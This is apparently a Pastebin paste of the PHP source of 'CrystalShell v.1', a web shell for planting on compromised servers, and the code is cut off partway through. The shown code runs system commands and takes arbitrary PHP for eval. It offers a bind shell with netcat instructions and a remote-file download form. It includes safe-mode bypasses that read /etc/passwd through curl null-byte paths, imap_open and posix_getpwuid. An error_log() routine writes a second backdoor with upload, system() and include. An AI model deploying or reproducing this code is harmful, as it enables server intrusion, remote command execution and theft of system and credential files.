Advertisement
blackcyberrootshell

[ + ] Crystal Shell [ + ]

Feb 27th, 2015
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 57.03 KB | None | 0 0
  1. <?
  2.  
  3.  
  4.  
  5.  
  6. error_reporting(5);
  7. @ignore_user_abort(true);
  8. @set_magic_quotes_runtime(0);
  9. $win = strtolower(substr(PHP_OS, 0, 3)) == "win";
  10. /**********************************************************/
  11. /*                          CrystalShell v.1
  12. /*                       --------- ----------
  13. /*
  14. /*       Coded by : Super-Crystal and Mohajer22
  15. /*    ------------------------------------------------
  16. /*    Arab Security Center Team <---thanks
  17. /*      mail : sup3r-hackers@hotmail.Com
  18. /* october73 shell & CrystalShell < coding by super crystal
  19. /*
  20. /*********************************************************/
  21. ?>
  22. <?$dir=realpath("./")."/";
  23. $dir=str_replace("\\","/",$dir);
  24. ?>
  25.  
  26. <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
  27. Crystal shell</title>
  28. <style type='text/css'> body {  background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
  29. SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
  30. {background-color:   #FFFFFF   !important}  input  {background-color:   #303030
  31. !important} option {  background-color:   #303030   !important}         textarea
  32. {background-color: #303030 !important} input {color: #1CB081 !important}  option
  33. {color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
  34. {background-color: #303030 !important} select {font-weight: normal;       color:
  35. #1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
  36. background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
  37. 0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
  38. !important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
  39. !important}     h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
  40. !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
  41. normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
  42. { text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
  43. color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
  44. font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
  45. font-weight:bold; font-style: italic;}-->
  46.   </style>
  47.   <![endif]-->
  48. <meta http-equiv=Content-Language content=ar>
  49. <!--[if gte mso 9]><xml>
  50.  <o:shapelayout v:ext="edit">
  51.   <o:idmap v:ext="edit" data="1"/>
  52.  </o:shapelayout></xml><![endif]-->
  53.  <style>
  54. <!--
  55. body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
  56. -->
  57. </style>
  58. <style>
  59. <!--
  60. #leftright, #topdown{
  61. position:absolute;
  62. left:0;
  63. top:0;
  64. width:1px;
  65. height:1px;
  66. layer-background-color:limegreen;
  67. background-color:red;
  68. z-index:100;
  69. font-size:1px;
  70. }
  71. -->
  72. </style>
  73.  
  74. </head>
  75.   </head>
  76. <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
  77. <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
  78.     <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
  79. <p align="center">&nbsp;</p>
  80.     <p align="center">
  81. <a bookmark="minipanel">
  82.     <font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
  83.     <font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p>
  84. </p>
  85. <a bookmark="minipanel">
  86. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  87. <p align="center">
  88.     <b>
  89.     <?
  90.     $dirfile="$file_to_download";
  91. if (file_exists("$dirfile"))
  92. {
  93. header("location: $dirfile");
  94. }
  95. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  96. {
  97.  $safemode = true;
  98.  $hsafemode = "<font color=\"red\">ON (secure)</font>";
  99.  
  100.  
  101. }
  102.  
  103. else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
  104. echo("Safe-mode: $hsafemode");
  105. // PHPINFO
  106. if ($_GET['action'] == "phpinfo") {
  107.     echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
  108.     exit;
  109. }
  110. $v = @ini_get("open_basedir");
  111. if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
  112. else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
  113. echo("<br>");
  114. echo("Open base dir: $hopenbasedir");
  115. echo("<br>");
  116. echo "PostgreSQL: <b>";
  117. $pg_on = @function_exists('pg_connect');
  118. if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  119. echo("<br>");
  120. echo "MSSQL: <b>";
  121. $mssql_on = @function_exists('mssql_connect');
  122. if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
  123. echo("<br>");
  124. echo "MySQL: <b>";
  125. $mysql_on = @function_exists('mysql_connect');
  126. if($mysql_on){
  127. echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
  128. echo("<br>");
  129. echo "PHP version: <b>".@phpversion()."</b>";
  130. echo("<br>");
  131. echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
  132.  
  133. echo("<br>");
  134. echo "Disable functions : <b>";
  135. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
  136. $free = @diskfreespace($dir);
  137. if (!$free) {$free = 0;}
  138. $all = @disk_total_space($dir);
  139. if (!$all) {$all = 0;}
  140. $used = $all-$free;
  141. $used_percent = @round(100/($all/$free),2);
  142.  
  143. ?>
  144. </b></p>
  145.     <p align="center">&nbsp;</p></td></tr></table>
  146. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  147.     <b>
  148. </b></p>
  149.     <p align="center">&nbsp;</p></td></tr></table>
  150.  
  151. </a>
  152.  
  153.  
  154.  
  155. </p>
  156.     <p align="center"><font color="#FFFF00">&nbsp;</font></p>
  157.     <p align="center"></p>
  158.     </th></tr><tr>
  159.         <td bgcolor="#000000" style="color: #DCE7EF">
  160. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  161. <font size="4px">
  162. <b>
  163.         <font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
  164. <font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
  165. </font>
  166. </p>
  167. </font>
  168. <font size=1 face=Verdana>
  169. <p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
  170. </b>
  171.     </font>
  172.     </font>
  173.     <a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
  174. <font size=-2 face=verdana color="#FFFFFF">
  175. <? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
  176.     </font>
  177. </a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
  178. <? echo getcwd();?></div></font></font></a></font></b></a></font><br>
  179.  
  180. <br>&nbsp;<b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
  181. &nbsp;</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
  182.  
  183.     </font></a><font face="Wingdings" size="5" color="#C0C0C0">ð</font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
  184. </font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
  185. </font>
  186. </b><b><font size="4px"><font size="4px" face="verdana" color="white">
  187. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  188. <font color=#DCE7EF face="Verdana" size="-2">&nbsp;</font></font></font><font face="verdana" color="white"><span lang="en-us"><a title="ÇáÃÏæÇÊ" href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="5">4</font></span></a><font size="4px" face="verdana" color="white"></a></font></b><b><font face=Verdana size="4px"><font size=-2 face=verdana>
  189. </font></font></b><b><font size="4px">
  190. <font size="4px" face="verdana" color="white">
  191. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  192. <font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font></font></font>
  193. <font face="verdana" color="white"><span lang="en-us">
  194. <a title="ÇáÊÔÝíÑ" href="?act=decoder"><font color=#CC0000 size="3">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="5">i</font></span></a><font size="3" face="verdana" color="white"></a></font><font size=-2 face=verdana>
  195. </font>
  196. </b><b><font size="4px"><font size="4px" face="verdana" color="white">
  197. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  198. <font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
  199.     </font></font><span lang="en-us"><font face="verdana" color="white">
  200.     <a href="?act=bypass"><font color=#CC0000 size="3">
  201. <a title="ËÛÑÇÊ ÇáãÑæÑ" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font></a></font><font face="Webdings" size="5" color="#C0C0C0">`</font></span><font size="4px" face="verdana" color="white"></a></font><font size=3 face=verdana>
  202. </font>
  203. <font size="4px" face="verdana" color="white">
  204. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  205. <font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
  206.     </font><font face="verdana" color="white"><span lang="en-us">
  207. <a title="ÇáÅÊÕÇá ÈÞÇÚÏÉ ÇáÈíÇäÇÊ" href="?act=SQL"><font color=#CC0000 size="3">SQL</font></a></span></font></b><font face="Webdings" size="5" color="#C0C0C0">Â</font><b><font size="3" face="verdana" color="white"></a></font></b><font size="3"></font></font><b><font face=Verdana size="4px"><font size=-2 face=verdana>
  208. </font></font></b><font size="4px"><b>
  209. <font size="4px" face="verdana" color="white">
  210. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  211. <font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="3">Bind</font></a></font></span></b><font face="Webdings" size="5" color="#C0C0C0">Â</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2"> </font>
  212.     </font></b></font><b><font face="verdana" color="white">
  213.     </b><b>
  214.     <a href="?act=help"><span lang="en-us"><font color=#CC0000 size="3">
  215. <a title="ÇáãÓÇÚÏÉ" href="?act=help"><font color="#CC0000">help</font></a></font></span></a></b></font><b><a title="ÇáãÓÇÚÏÉ" href="?act=help"><font size="4px" face="verdana" color="#CC0000"></a></font></a><font size=3 face=verdana>
  216. </font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="5">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="3"><a title="ÇÞÑÇÁäí" href="?act=about"><font color="#CC0000">about</font></a></font></span></a></font></a><font size=3 face=verdana>
  217. </font></b><span lang="en-us"><font size=5 face=Wingdings color="#C0C0C0">
  218. ?</font></span></p>
  219. <p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
  220. [</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
  221.  
  222. <font size="4px">
  223.     <font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  224.     <font size=-2 face=verdana color=#CC0000>server </font>
  225.     <font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
  226.     </font></a></font>
  227. </a></font>
  228. </font><b>
  229. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  230. <font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
  231. <font size=-2 face=verdana color=white>
  232.     <font size="4px" face="verdana" color="white">
  233.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  234.     <font face=Verdana size=-2 color="#008000">
  235.     CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
  236.     <font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
  237. admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
  238. </font>
  239.     </b>
  240. </font></a>&nbsp;&nbsp;<br>
  241.  
  242. <font size="4px">
  243. <b>
  244. <font size=-2 face=verdana color=white>
  245.     <font face=Verdana size=-2 color="#CC0000">
  246.     <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
  247.     <font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
  248.     </font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
  249.     </font>
  250.     </a>
  251.  
  252. <font size="4px">
  253. </a>
  254. <font size=-2 face=verdana color=white>
  255.  
  256.     &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  257. </font></font>
  258.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  259.     <font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  260.     </font>
  261.     <font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
  262. port
  263.     </font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
  264.     </font></font>
  265.     </font>
  266.     </font>
  267.     </b>
  268. </font></p></td></tr></table>
  269. <?
  270. if ($act == "help") {echo "<center><b>ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå<br><br>ÚÒíÒí ÇáãÓÊÎÏã<br>ÇÐÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑÞ<br>æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ   </a>.</b>";}
  271. if ($act == "bindport"){
  272. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  273. <b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
  274. <b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
  275. <INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
  276. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
  277. <INPUT type=\"submit\" value=\"Connect\"></form></div>";
  278. }
  279. if ($act == "tools"){
  280.     echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  281. File to edit:
  282. <input type=\"text\" name=\"editfile\" >
  283. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
  284. <INPUT type=\"submit\" value=\"Edit\"></form></div>";
  285.  echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
  286. <table id=tb><tr><td>
  287. <INPUT type=\"hidden\" name=\"php\" value=\"yes\">
  288. <INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
  289. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  290. <table id=tb><tr><td>Download here <b>from</b>:
  291. <INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
  292. <b>-->>:</b>
  293. <INPUT type=\"text\" name=\"fileto\" size=30>
  294. <INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
  295. <INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
  296. }
  297. if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic  </a>.</b>";}
  298.  
  299. if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect Þã ÈÇáÖÛØ Úáì ÎíÇÑ.<br>.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ<br>.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì<br>nc -lp 3333ÈßÊÇÈÉ ÇáãäÝÐ - <br>ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá <br>Bind port to  :<br> bind shell æåäíÆÇ ð áß   </a>.</b>";}
  300.  
  301. if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå  Select ------ x  ÇÖÛØ Úáì ÇáÎíÇÑ<br>.- æÇÐÇ ÇÑÏÊ ßÊÇÈå  ÇáÇæÇãÑ ÈäÝÓß ÞÏ ÊßÊÝí ÈÇáÎíÇÑ<br>Command   </a>.</b>";}
  302.  
  303. if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks  </a>.</b>";}
  304. if (array_key_exists('image', $_GET)) {
  305.     header('Content-Type: image/gif');
  306.     die(getimage($_GET['image']));
  307. }
  308.  
  309. if ($act == "bypass") {
  310. echo "
  311. <form action=\"$REQUEST_URI\" method=\"POST\">
  312. <table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
  313. ";
  314. echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
  315. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  316. <table id=tb><tr><td>read file :
  317. <INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
  318. <INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
  319. echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
  320. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  321. <table id=tb><tr><td>read file :
  322. <INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
  323. <INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
  324. echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
  325. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  326. <table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
  327. <INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
  328. <INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
  329. echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
  330. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  331. <table id=tb><tr><td>
  332. <select name=plugin><option>cat /etc/passwd</option></select>
  333. <INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
  334. echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
  335. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  336. <table id=tb><tr><td>
  337. <INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
  338. <INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
  339. }
  340. if ($act == "decoder"){
  341. echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
  342. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  343. <table id=tb><tr><td>
  344. <textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
  345. </textarea><br>
  346. <INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
  347. }
  348. if ($act == "SQL"){
  349. echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
  350. echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
  351. <table id=tb><tr><td> Username :
  352. <INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
  353. password :
  354. <INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
  355. <input type=submit value='Enter'>\n
  356. <input type=reset value='Clear'></td></tr></table></form></div>";
  357. }
  358. ?>
  359.  
  360.  
  361.  
  362. <br>
  363. <TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
  364.     <td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
  365.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  366.     <TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
  367.     <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
  368.     <td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
  369.     &nbsp;</p>
  370.     <p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
  371.         <tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
  372.             <td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
  373. <?php
  374. // chr() //
  375. if(empty($_POST['Mohajer22'])){
  376. } else {
  377. $m=$_POST['Mohajer22'];
  378. $m=str_replace(" ","",$m);
  379. $m=str_replace("(","",$m);
  380. $m=str_replace(")","",$m);
  381. $m=str_replace(".",";",$m);
  382. $m=str_replace("chr","&#",$m);
  383. $m=str_replace(" ","",$m);
  384. echo $m ;
  385. }
  386. // ERORR //
  387. if(empty($_POST['ERORR'])){
  388. } else {
  389. $ERORR=$_POST['ERORR'];
  390. echo  error_log("
  391. <html>
  392. <head>
  393. <title> Exploit: error_log() By * Super-Crystal  * </title>
  394. <body bgcolor=\"#000000\">
  395. <table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
  396. <tr>
  397. <td><center><font size='6' color='#BBB516'> By  * Super-Crystal * TrYaG Team</font></center></td>
  398. </tr>
  399. </table>
  400. <font color='#FF0000'>
  401. </head>
  402. <?
  403. if(\$fileup == \"\"){
  404. ECHO \" reade for up \";
  405. }else{
  406. \$path= exec(\"pwd\");
  407. \$path .= \"/\$fileup_name\";
  408. \$CopyFile = copy(\$fileup,\"\$path\");
  409. if(\$CopyFile){
  410. echo \" up ok \";
  411. }else{
  412. echo \" no up \";
  413. }
  414. }
  415. if(empty(\$_POST['m'])){
  416. } else {
  417. \$m=\$_POST['m'];
  418. echo  system(\$m);
  419. }
  420. if(empty(\$_POST['cmd'])){
  421. } else {
  422. \$h=  \$_POST['cmd'];
  423. print include(\$h) ;
  424.   }
  425.  
  426.  
  427. ?>
  428. <form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
  429. <input type='file' name='fileup' size='20'>
  430. <input type='submit' value='  up  '>
  431. </form>
  432. <form method='POST'  action='Super-Crystal.php'>
  433. <input type='cmd' name='cmd' size='20'>
  434. <input type='submit' value='  open (shill.txt) '>
  435. </form>
  436. <form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
  437. <input type='text' name='m' size='20'>
  438. <input type='submit' value='  run  '>
  439. <input type='reset' value=' reset '>
  440. </form>
  441. ", 3,$ERORR);
  442. }
  443. // id //
  444. if ($_POST['plugin'] ){
  445.  
  446.  
  447.                                   switch($_POST['plugin']){
  448.                                  case("cat /etc/passwd"):
  449.                                            for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
  450.                                         $ara = posix_getpwuid($uid);
  451.                                                 if (!empty($ara)) {
  452.                                                   while (list ($key, $val) = each($ara)){
  453.                                                     print "$val:";
  454.                                                   }
  455.                                                   print "<br>";
  456.                                                 }
  457.                                         }
  458.  
  459.                                 break;
  460.  
  461.  
  462.                                                 }
  463.                                                }
  464.  
  465. // imap //
  466. $string = !empty($_POST['string']) ? $_POST['string'] : 0;
  467. $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
  468.  
  469. if ($string && $switch == "file") {
  470. $stream = imap_open($string, "", "");
  471.  
  472. $str = imap_body($stream, 1);
  473. if (!empty($str))
  474. echo "<pre>".$str."</pre>";
  475. imap_close($stream);
  476. } elseif ($string && $switch == "dir") {
  477. $stream = imap_open("/etc/passwd", "", "");
  478. if ($stream == FALSE)
  479. die("Can't open imap stream");
  480. $string = explode("|",$string);
  481. if (count($string) > 1)
  482. $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
  483. else
  484. $dir_list = imap_list($stream, trim($string[0]), "*");
  485. echo "<pre>";
  486. for ($i = 0; $i < count($dir_list); $i++)
  487. echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
  488. echo "</pre>";
  489. imap_close($stream);
  490. }
  491. // CURL //
  492. if(empty($_POST['curl'])){
  493. } else {
  494. $m=$_POST['curl'];
  495. $ch =
  496. curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
  497. curl_exec($ch);
  498. var_dump(curl_exec($ch));
